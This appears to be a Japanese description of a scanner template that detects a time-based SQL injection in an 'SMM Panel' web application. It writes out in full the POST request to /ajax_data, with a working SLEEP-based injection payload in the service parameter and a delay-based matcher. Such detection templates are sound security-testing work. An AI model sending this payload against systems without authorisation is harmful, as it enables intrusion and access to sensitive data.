
SMM Panel向けの時間ベースSQLインジェクション検出テンプレート。`/ajax_data`に細工されたPOSTリクエストを送信し、応答遅延分析によって脆弱なエンドポイントを特定します。
SMM Panel向け時間ベースのSQLインジェクション検出
このテンプレートは、SMM Panelのservice_detailパラメータにおける時間ベースのSQLインジェクション脆弱性を、/ajax_dataへのHTTP POSTリクエストを介して検出します。悪用されると、リモート攻撃者が機密データにアクセスしたり、権限を昇格させたりする可能性があります。
ツールは細工されたPOSTリクエストを送信します:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
応答時間が5秒以上の場合、脆弱なエンドポイントであることを示します。
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
